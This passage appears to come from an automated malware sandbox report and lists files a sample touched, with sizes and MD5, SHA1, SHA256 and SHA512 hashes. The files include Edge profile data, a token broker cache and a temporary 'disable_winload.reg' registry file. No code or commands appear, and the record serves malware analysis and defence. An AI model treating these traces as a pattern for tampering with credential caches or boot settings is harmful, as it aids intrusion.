f568aa71db240dae23b5607b6fbb42c1d36784ad

SHA256
439142c683d163addad7f33f7976851b431a6e492335c0fea21a8bab58229f06

SHA512
81a44e08244a167f0e53448678eb2cc132e7bdbd5e8ff7735c656b92babdd4e35f7fb4d85d957221071931c903a17e85e7877f7a755c9b98a12e4fd618739e18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
9151c7bc04c89b85c26b6507ebaa3e80

SHA1
4f353f60aa3fd6fea8402d516200125a3a5e00bc

SHA256
fb7679d880b9e783ec3a5888f2acda186c4ec6c68938fd777bc757524958e14b

SHA512
1ef2803677617a33ea932e43b726658c455b769dc4223fee932c4729243e3f121235e8d403798c438f64912925bec305e55e3ae1cf0b9d997fe3fb1ba81cc3c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
Filesize
264KB

MD5
07cfa33bb6443dc294d155e8654ba58d

SHA1
554cf31c71a3812d9311511ef5036ee13ec49d2e

SHA256
9bc4994307fd399a63872ce4aec3baccb1db81514e6ab9aec2f54832704bbab4

SHA512
b7ea1eac2ee7ba8c20d87ee29d540bb0d7bb84a58f9b2b9605e0daeff6610329f11f1fcac5f76b9b9e2c5c2b827aeea04d6c2497a5dee2c73612b05e3e716b6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
Filesize
4B

MD5
274583a65fe6b9b9874eb891eb0acf17

SHA1
19c068ea4adbdf7bfe8729c603dcf8ba9249dac5

SHA256
817f4787ab03c4377decd864c064ec156a0b3f5dffdc70795908d37a81a556bb

SHA512
249d4ec5e10f0d61965d6ec6da27c0e620b362cae669f92fb203a06e4c0613dc57ce9c623fd4a19deb83cd0a9e5c6b2c7c10b33dd4f8c7e519db5fcca9758286

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\fe88f101-2b76-4dce-9d39-d73c8f4ea499.tmp
Filesize
11KB

MD5
d26e30ee3d815d90e6adad4ae04398fc

SHA1
a55710c35b820eac0642f6f96f143b75e7894689

SHA256
80df4ac0cff475e7ee3fba92440e23f4259b94cef36747b2ff8d47be6ebccdcb

SHA512
abb50ff93d4449bda7906e5dfa2d1ee7cee14559318f54898df52f32b856ad3146f42c06d631e096495e32ff099825f0658f05428be7471ce6d5b92fb15b4605

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize
4KB

MD5
f6ee8af82761e872d702c57668e24162

SHA1
8535700d25715fc0c44186def44dee7528599b65

SHA256
195767e2274244bd4bd619c5fdc71975c7418bc123d3f23471cf9e35a731d370

SHA512
10bf2b2747cf909e9ea7bfb856864e8cef5945ccdb703b36083ac53f9b25c49b51b0e0486dd6d32d9271fa82986360ca18aaf27361dc5d27b69dad7bb8e72eb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
Filesize
91B

MD5
47b5ae368c4aff20eafa90ffdcd03a34

SHA1
dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81

SHA256
aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07

SHA512
c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
Filesize
1024KB

MD5
b0bcb925d85cd65cc926570d3dfed96e

SHA1
23c123a744528fbd7325a597ebbc7c75e6ea853d

SHA256
cb215908a1c883d3cfb7ed6157d42af6da3a8fcf5993f3f3d582c5f7ec683d23

SHA512
a0037f1ef86a4c2eeef6b19de16d6d71eff35aaff9daedfbc7f8227305d8acc8d36e119c590ef1ca6d3a25e2bbb0b6e91202ec93c1b22e7b961e00e839d8ba94

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
7KB

MD5
a1dfdeb0848c46179d0d882ffe23d376

SHA1
8d52d9199d3bd2b12ba714fcf978eb7e44e46d07

SHA256
aeeeb2061f29f4e7633b58063d231debddb3110fde08ecf97bc25b76dcf491b0

SHA512
aba22cbaeb799cfea34c3a0a9c4a5d6822e40622f52df061097b5e77cc5cb329f75b8c7ae654b8f0944f4fbf2ba2d63f6352693fafb9cd11bb1df3fb249a62aa

Download Submit
\??\pipe\LOCAL\crashpad_4988_TIQWTLYHSJVDGSMX
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit